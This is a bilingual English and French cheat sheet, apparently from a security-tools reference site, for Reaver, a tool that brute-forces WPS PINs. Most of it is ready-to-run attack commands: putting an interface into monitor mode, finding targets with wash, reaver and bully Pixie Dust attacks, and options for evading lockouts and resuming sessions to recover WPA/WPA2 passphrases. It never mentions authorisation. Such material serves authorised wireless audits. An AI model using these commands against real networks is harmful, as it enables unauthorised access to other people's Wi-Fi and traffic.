Reaver

Outil de brute-force du PIN WPS. Exploite une faille de conception du protocole WPS pour récupérer les passphrases WPA/WPA2 des routeurs équipés du WPS. WPS PIN brute-force attack tool. Exploits the WPS protocol design flaw to recover WPA/WPA2 passphrases from WPS-enabled routers.

↗ https://github.com/t6x/reaver-wps-fork-t6x

Overview

Reaver exploits a design flaw in the WPS (Wi-Fi Protected Setup) protocol to brute-force the 8-digit PIN. Due to how WPS validates PINs in two halves, the effective keyspace is only 11,000 combinations rather than 100 million. A successful attack recovers the WPA/WPA2 passphrase.

Prerequisites

# Enable monitor mode first
airmon-ng check kill
airmon-ng start wlan0
# interface is now wlan0mon

Find WPS-enabled targets

wash -i wlan0mon        # List WPS networks and their lock status

Basic Attack

Attack a specific WPS-enabled AP

sudo reaver -i wlan0mon -b AA:BB:CC:DD:EE:FF -vv

With more verbose output

sudo reaver -i wlan0mon -b AA:BB:CC:DD:EE:FF -vv -d 2 -r 3:30

Slower but more reliable (avoids lockouts)

sudo reaver -i wlan0mon -b AA:BB:CC:DD:EE:FF -vv --delay=3 --lock-delay=60

Pixie Dust Attack (pixiewps)

Much faster than PIN brute-force — works instantly on vulnerable routers:

Pixie Dust via reaver

sudo reaver -i wlan0mon -b AA:BB:CC:DD:EE:FF -vv -K 1

Alternative: bully with pixie dust

sudo bully wlan0mon -b AA:BB:CC:DD:EE:FF --pixie -v 3

Scanning for WPS Targets

wash — list WPS networks

sudo wash -i wlan0mon
# Output:
# BSSID              Ch  dBm  WPS  Lck  Vendor    ESSID
# AA:BB:CC:DD:EE:FF   6  -70  2.0  No   Ralink    MyNetwork

# Fields of interest:
# WPS: WPS version
# Lck: WPS locked (Yes = lockout active, No = can attack)

Dealing with WPS Lockouts

Check if locked with wash

sudo wash -i wlan0mon | grep AA:BB:CC:DD:EE:FF

Wait for lockout to expire (usually 5-60 minutes) Then resume:

sudo reaver -i wlan0mon -b AA:BB:CC:DD:EE:FF -vv --lock-delay=60

Resume from saved session

sudo reaver -i wlan0mon -b AA:BB:CC:DD:EE:FF -vv --session=AA:BB:CC:DD:EE:FF.wpc

Fake Auth (if required)

Some APs require association before WPS negotiation

sudo reaver -i wlan0mon -b AA:BB:CC:DD:EE:FF -vv -A

Options for Difficult Targets

Slow down attack (reduce lockout risk)

sudo reaver -i wlan0mon -b AA:BB:CC:DD:EE:FF -d 10 --lock-delay=300

Specify channel

sudo reaver -i wlan0mon -b AA:BB:CC:DD:EE:FF -c 6 -vv

Ignore timeouts

sudo reaver -i wlan0mon -b AA:BB:CC:DD:EE:FF --timeout=10 --fail-wait=360

Start from a specific PIN

sudo reaver -i wlan0mon -b AA:BB:CC:DD:EE:FF -p 12345670

Tips

  • Try Pixie Dust (-K 1) first — it’s instantaneous on vulnerable routers
  • Check wash for WPS lock status before attacking to avoid wasting time
  • --lock-delay=300 waits 5 minutes when a lock is detected before retrying
  • WPS is disabled on modern routers by default; always check wash for enabled APs
  • The PIN brute-force can take 4-10 hours on routers without lockout protection
Help / Man page
reaver -i <iface> -b <bssid> [options]

Required:
  -i iface      Monitor mode interface
  -b BSSID      Target AP BSSID

Options:
  -c channel    Set channel (auto-detect if omitted)
  -e ESSID      Target ESSID
  -A            Don't associate before attack
  -f            Fake EAPOL Start before each negotiation
  -N            Don't send NACK on errors
  -S            Use small DH keys to speed up attack
  -L            Ignore locked state
  -E            Terminate each association after each attempt
  -d delay      Delay between attempts (default: 1)
  -l delay      Time to wait when locked (default: 315)
  -r N:secs     After N attempts, sleep for secs
  -K N          Run Pixie Dust attack (1=pixiewps)
  -p PIN        Start from specific PIN
  -vv           Very verbose output
  -q            Less verbose output

Vue d’ensemble

Reaver exploite une faille de conception dans le protocole WPS (Wi-Fi Protected Setup) pour brute-forcer le PIN à 8 chiffres. En raison de la façon dont le WPS valide les PIN en deux moitiés, l’espace de clés effectif n’est que de 11 000 combinaisons plutôt que 100 millions. Une attaque réussie récupère la passphrase WPA/WPA2.

Prérequis

# Activer d'abord le mode monitor
airmon-ng check kill
airmon-ng start wlan0
# l'interface est maintenant wlan0mon

Trouver des cibles équipées du WPS

wash -i wlan0mon        # Lister les réseaux WPS et leur statut de verrouillage

Attaque basique

# Attaquer un AP WPS spécifique
sudo reaver -i wlan0mon -b AA:BB:CC:DD:EE:FF -vv

# Avec une sortie plus verbeuse
sudo reaver -i wlan0mon -b AA:BB:CC:DD:EE:FF -vv -d 2 -r 3:30

# Plus lent mais plus fiable (évite les lockouts)
sudo reaver -i wlan0mon -b AA:BB:CC:DD:EE:FF -vv --delay=3 --lock-delay=60

Attaque Pixie Dust (pixiewps)

Bien plus rapide que le brute-force de PIN : fonctionne instantanément sur les routeurs vulnérables :

# Pixie Dust via reaver
sudo reaver -i wlan0mon -b AA:BB:CC:DD:EE:FF -vv -K 1

# Alternative : bully avec pixie dust
sudo bully wlan0mon -b AA:BB:CC:DD:EE:FF --pixie -v 3

Recherche de cibles WPS

# wash : lister les réseaux WPS
sudo wash -i wlan0mon
# Sortie :
# BSSID              Ch  dBm  WPS  Lck  Vendor    ESSID
# AA:BB:CC:DD:EE:FF   6  -70  2.0  No   Ralink    MyNetwork

# Champs d'intérêt :
# WPS : version du WPS
# Lck : verrouillage WPS (Yes = lockout actif, No = attaque possible)

Gérer les lockouts WPS

# Vérifier le verrouillage avec wash
sudo wash -i wlan0mon | grep AA:BB:CC:DD:EE:FF

Attendre l’expiration du lockout (généralement 5 à 60 minutes), puis reprendre :

sudo reaver -i wlan0mon -b AA:BB:CC:DD:EE:FF -vv --lock-delay=60

Reprendre depuis une session sauvegardée

sudo reaver -i wlan0mon -b AA:BB:CC:DD:EE:FF -vv --session=AA:BB:CC:DD:EE:FF.wpc

Fausse authentification (si nécessaire)

Certains AP requièrent une association avant la négociation WPS

sudo reaver -i wlan0mon -b AA:BB:CC:DD:EE:FF -vv -A

Options pour cibles difficiles

# Ralentir l'attaque (réduire le risque de lockout)
sudo reaver -i wlan0mon -b AA:BB:CC:DD:EE:FF -d 10 --lock-delay=300

# Spécifier le canal
sudo reaver -i wlan0mon -b AA:BB:CC:DD:EE:FF -c 6 -vv

# Ignorer les timeouts
sudo reaver -i wlan0mon -b AA:BB:CC:DD:EE:FF --timeout=10 --fail-wait=360

# Démarrer depuis un PIN spécifique
sudo reaver -i wlan0mon -b AA:BB:CC:DD:EE:FF -p 12345670

Conseils

  • Essayer Pixie Dust (-K 1) en premier : c’est instantané sur les routeurs vulnérables
  • Vérifier wash pour le statut de verrouillage WPS avant d’attaquer pour éviter de perdre du temps
  • --lock-delay=300 attend 5 minutes quand un verrouillage est détecté avant de réessayer
  • Le WPS est désactivé par défaut sur les routeurs modernes ; toujours vérifier wash pour les AP l’ayant activé
  • Le brute-force de PIN peut prendre 4 à 10 heures sur des routeurs sans protection contre les lockouts
Aide / Page de manuel
reaver -i <iface> -b <bssid> [options]

Required:
  -i iface      Monitor mode interface
  -b BSSID      Target AP BSSID

Options:
  -c channel    Set channel (auto-detect if omitted)
  -e ESSID      Target ESSID
  -A            Don't associate before attack
  -f            Fake EAPOL Start before each negotiation
  -N            Don't send NACK on errors
  -S            Use small DH keys to speed up attack
  -L            Ignore locked state
  -E            Terminate each association after each attempt
  -d delay      Delay between attempts (default: 1)
  -l delay      Time to wait when locked (default: 315)
  -r N:secs     After N attempts, sleep for secs
  -K N          Run Pixie Dust attack (1=pixiewps)
  -p PIN        Start from specific PIN
  -vv           Very verbose output
  -q            Less verbose output